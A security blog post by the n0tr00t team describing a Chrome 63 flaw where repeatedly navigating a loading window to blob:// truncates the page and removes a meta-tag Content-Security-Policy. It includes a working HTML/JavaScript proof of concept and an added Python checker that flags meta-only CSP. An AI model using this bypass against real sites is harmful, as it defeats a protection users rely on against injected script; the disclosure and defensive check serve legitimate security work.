~# n0tr00t Security Team

Chrome 63.0 CSP Bypass/Page Truncation by navigating to Blob during load

19 Dec 2018 - evi1m0

[+] Author: evi1m0
[+] Team: n0tr00t security team 
[+] From: https://www.n0tr00t.com
[+] Create: 2018-12-19

0x01 TL;DR

I noticed that when a try/catch inside a timer uses location to navigate to the blob scheme, the loading of the page's network request is interrupted at a random point (the page finishes loading, but part of its content is missing; interestingly, the content goes missing in top-to-bottom order). This flaw suggested to me that it could be used to eat, before anything else, the CSP policy declared in the head, so that the declared policy is completely ineffective and injected content executes as normal.

For example:

<cut>

content...

<meta http-equiv="Content-Security-Policy" content="script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:">

</cut>

content...

here injection

Truncating Google or Bing:

https://i.loli.net/2017/11/09/5a040d0918a19.jpg

https://i.loli.net/2017/11/09/5a040d38ba95e.jpg
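As an added defender-side check that is not part of the original post: the truncation described above can only drop a policy declared inside the HTML, whereas a Content-Security-Policy sent as an HTTP response header is processed before any markup arrives and cannot be cut away. The Python function below (written for this page, not the author's code; the header dictionary and HTML are constructed samples) reports where a response's CSP is declared and flags pages that rely on the meta tag alone.

```python
from html.parser import HTMLParser


class _MetaCspFinder(HTMLParser):
    """Collects the content of every <meta http-equiv="Content-Security-Policy"> tag."""

    def __init__(self):
        super().__init__()
        self.policies = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attrs = {name.lower(): (value or "") for name, value in attrs}
        if attrs.get("http-equiv", "").strip().lower() == "content-security-policy":
            self.policies.append(attrs.get("content", "").strip())


def csp_delivery(headers, html):
    """Return where a response declares its CSP and whether that declaration
    survives the HTML stream being truncated mid-load.

    headers: dict of response header name -> value (case-insensitive lookup).
    html:    the response body as text.
    """
    header_policies = [v.strip() for k, v in headers.items()
                       if k.lower() == "content-security-policy" and v.strip()]
    finder = _MetaCspFinder()
    finder.feed(html)
    return {
        "header": header_policies,
        "meta": finder.policies,
        # A header policy is applied before any markup is parsed.
        "truncation_resistant": bool(header_policies),
        # Only a meta-declared policy can be lost when the head is cut off.
        "meta_only": bool(finder.policies) and not header_policies,
    }


# Constructed sample page that carries the policy from the post in a meta tag only.
SAMPLE_META_ONLY_HTML = """<html><head>
<meta http-equiv="Content-Security-Policy" content="script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:">
</head><body>content...</body></html>"""

if __name__ == "__main__":
    print(csp_delivery({"Content-Type": "text/html"}, SAMPLE_META_ONLY_HTML))
    print(csp_delivery({"Content-Security-Policy": "script-src 'self'"}, SAMPLE_META_ONLY_HTML))
```

A page whose report shows meta_only is the case this post's truncation affects; moving the same policy into the response header removes that exposure.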

0x02 PoC

<html>
    <!-- author: evi1m0.bat[at]gmail.com -->
    <script>
        pwn = () => {
            target = 'http://server.n0tr00t.com/chrome/csptest.php?p=' + Date();
            win = window.open(target, "emm", "width=500,height=400");

            setInterval(`try{
                    x = win.location.href;
                } catch(e) {
                    win.location.href = 'blob://';
                }`, 1);
        }
    </script>

    <p>
      <a onclick="pwn()" target="_blank">Click me bypass CSP</a>
      // If it doesn't work, again. :)
    </p>
</html>

0x03 Video

0x04 Track